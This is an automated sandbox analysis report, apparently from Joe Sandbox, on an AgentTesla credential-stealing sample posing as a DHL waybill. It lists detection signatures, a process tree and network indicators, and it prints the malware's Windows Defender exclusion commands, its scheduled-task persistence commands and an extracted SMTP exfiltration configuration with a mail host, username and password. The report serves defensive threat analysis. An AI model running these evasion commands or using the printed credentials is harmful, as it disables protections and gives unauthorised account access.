
Windows Analysis Report
AWB#150332.exe

Overview

General Information

Sample name: AWB#150332.exe
Analysis ID: 1568202
MD5: def8249dc6df546f68ce491ee14282c9
SHA1: fdaaf599b51a6d13dda0bada44108dca334edddc
SHA256: 63382a3cc1e90e7dfa54826a62bfb5da86f4ad44a07cffca70fa3c509bbd5ad7
Tags: AgentTesla, DHL, exe, user-cocaman

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • AWB#150332.exe (PID: 5432 cmdline: "C:\Users\user\Desktop\AWB#150332.exe" MD5: DEF8249DC6DF546F68CE491EE14282C9)
    • powershell.exe (PID: 2004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7440 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6068 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • nYNBzxFhCu.exe (PID: 7412 cmdline: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe MD5: DEF8249DC6DF546F68CE491EE14282C9)
    • schtasks.exe (PID: 8004 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • boqXv.exe (PID: 8156 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • boqXv.exe (PID: 1196 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration: {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.azmaplast.com", "Username": "info@azmaplast.com", "Password": "QAZqaz123@@"}
Source | Rule | Description | Author | Strings
00000009.00000002.1333001679.0000000002EA2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000015.00000002.2468581975.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000015.00000002.2468581975.0000000002F43000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
9.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
9.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
9.2.RegSvcs.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x33afc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x33b6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x33bf8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33c8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33cf4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33d66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x33dfc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x33e8c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.AWB#150332.exe.41e0e58.5.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.AWB#150332.exe.41e0e58.5.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

                    System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB#150332.exe", ParentImage: C:\Users\user\Desktop\AWB#150332.exe, ParentProcessId: 5432, ParentProcessName: AWB#150332.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", ProcessId: 2004, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7200, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boqXv
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB#150332.exe", ParentImage: C:\Users\user\Desktop\AWB#150332.exe, ParentProcessId: 5432, ParentProcessName: AWB#150332.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", ProcessId: 2004, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe, ParentImage: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe, ParentProcessId: 7412, ParentProcessName: nYNBzxFhCu.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp", ProcessId: 8004, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 193.141.65.39, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7200, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49707
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB#150332.exe", ParentImage: C:\Users\user\Desktop\AWB#150332.exe, ParentProcessId: 5432, ParentProcessName: AWB#150332.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp", ProcessId: 6068, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB#150332.exe", ParentImage: C:\Users\user\Desktop\AWB#150332.exe, ParentProcessId: 5432, ParentProcessName: AWB#150332.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", ProcessId: 2004, ProcessName: powershell.exe

                    Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB#150332.exe", ParentImage: C:\Users\user\Desktop\AWB#150332.exe, ParentProcessId: 5432, ParentProcessName: AWB#150332.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp", ProcessId: 6068, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-04T12:52:54.945943+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.7 | 49710 | 193.141.65.39 | 587 | TCP
2024-12-04T12:52:54.945943+0100 | 2839723 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49710 | 193.141.65.39 | 587 | TCP


                    AV Detection

Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.azmaplast.com", "Username": "info@azmaplast.com", "Password": "QAZqaz123@@"}
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | ReversingLabs: Detection: 26%
Source: AWB#150332.exe | ReversingLabs: Detection: 26%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Joe Sandbox ML: detected
Source: AWB#150332.exe | Joe Sandbox ML: detected
Source: AWB#150332.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: AWB#150332.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: yOCXb.pdbSHA256N source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr
Source: Binary string: yOCXb.pdb source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr
Source: Binary string: RegSvcs.pdb, source: boqXv.exe, 00000016.00000000.1353896187.0000000000BD2000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr
Source: Binary string: RegSvcs.pdb source: boqXv.exe, 00000016.00000000.1353896187.0000000000BD2000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr

                    Networking

Source: Network traffic | Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.7:49710 -> 193.141.65.39:587
Source: Network traffic | Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.7:49710 -> 193.141.65.39:587
Source: Yara match | File source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.7:49707 -> 193.141.65.39:587
Source: Joe Sandbox View | IP Address: 193.141.65.39
Source: Joe Sandbox View | ASN Name: KPNNL
Source: global traffic | TCP traffic: 192.168.2.7:49707 -> 193.141.65.39:587
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mail.azmaplast.com
Source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: RegSvcs.exe, 00000009.00000002.1333001679.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.2468581975.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.azmaplast.com
Source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: AWB#150332.exe, 00000000.00000002.1258173545.0000000003161000.00000004.00000800.00020000.00000000.sdmp, nYNBzxFhCu.exe, 0000000C.00000002.1333854899.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AWB#150332.exe, 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, FaJzHLniypp.cs | .Net Code: _5cQa10w
Source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, FaJzHLniypp.cs | .Net Code: _5cQa10w

                    System Summary

Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.AWB#150332.exe.41e0e58.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.AWB#150332.exe.41a5e38.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: AWB#150332.exe, frmLogin.cs | Long String: Length: 123476
Source: nYNBzxFhCu.exe.0.dr, frmLogin.cs | Long String: Length: 123476
Source: C:\Users\user\Desktop\AWB#150332.exe | Code function: 0_2_0180D584
Source: C:\Users\user\Desktop\AWB#150332.exe | Code function: 0_2_07537F90
Source: C:\Users\user\Desktop\AWB#150332.exe | Code function: 0_2_07536728
Source: C:\Users\user\Desktop\AWB#150332.exe | Code function: 0_2_075366AA
Source: C:\Users\user\Desktop\AWB#150332.exe | Code function: 0_2_0753B428
Source: C:\Users\user\Desktop\AWB#150332.exe | Code function: 0_2_0753D0A0
Source: C:\Users\user\Desktop\AWB#150332.exe | Code function: 0_2_0753AFF0
Source: C:\Users\user\Desktop\AWB#150332.exe | Code function: 0_2_07537F80
Source: C:\Users\user\Desktop\AWB#150332.exe | Code function: 0_2_0753CE30
Source: C:\Users\user\Desktop\AWB#150332.exe | Code function: 0_2_0753BC98
Source: C:\Users\user\Desktop\AWB#150332.exe | Code function: 0_2_0753BC87
Source: C:\Users\user\Desktop\AWB#150332.exe | Code function: 0_2_0753B860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02D1D738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02D1A4A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02D14AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02D13EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02D14200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_062F32A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_062F4300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_062F0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_062FC0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_062F8F3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_062FDF78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_062F5A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_062F53A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_062F39EF
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_02A8D584
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_073096F8
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_07327F90
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_07326728
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_073266AA
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_0732B428
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_0732B418
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_0732700D
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_0732D0A0
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_0732D090
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_07327F80
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_0732AFF0
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_0732BC98
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_0732BC87
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_0732B860
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_0732B850
Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe | Code function: 12_2_0B962538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_0153D730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_01539818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_01534AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_01533EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_0153A3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_01534200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_059A8CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_059AB690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_064A8F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_064A5A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_064A32A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_064A4300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_064A0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_064AC0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_064AE0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_064A3A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 21_2_064A53A0
Source: AWB#150332.exe | Static PE information: invalid certificate
Source: AWB#150332.exe, 00000000.00000002.1257179043.000000000159E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs AWB#150332.exe
Source: AWB#150332.exe, 00000000.00000002.1279870899.0000000007420000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs AWB#150332.exe
Source: AWB#150332.exe, 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename303ccb5a-e74e-425a-949b-a0bf6563c022.exe4 vs AWB#150332.exe
Source: AWB#150332.exe, 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs AWB#150332.exe
Source: AWB#150332.exe, 00000000.00000002.1258173545.00000000031A8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename303ccb5a-e74e-425a-949b-a0bf6563c022.exe4 vs AWB#150332.exe
Source: AWB#150332.exe, 00000000.00000002.1258173545.00000000031A8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs AWB#150332.exe
Source: AWB#150332.exe, 00000000.00000002.1280192882.0000000007540000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs AWB#150332.exe
Source: AWB#150332.exe, 00000000.00000000.1219099995.0000000000D92000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameyOCXb.exe. vs AWB#150332.exe
Source: AWB#150332.exe | Binary or memory string: OriginalFilenameyOCXb.exe. vs AWB#150332.exe
Source: AWB#150332.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.AWB#150332.exe.41e0e58.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.AWB#150332.exe.41a5e38.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
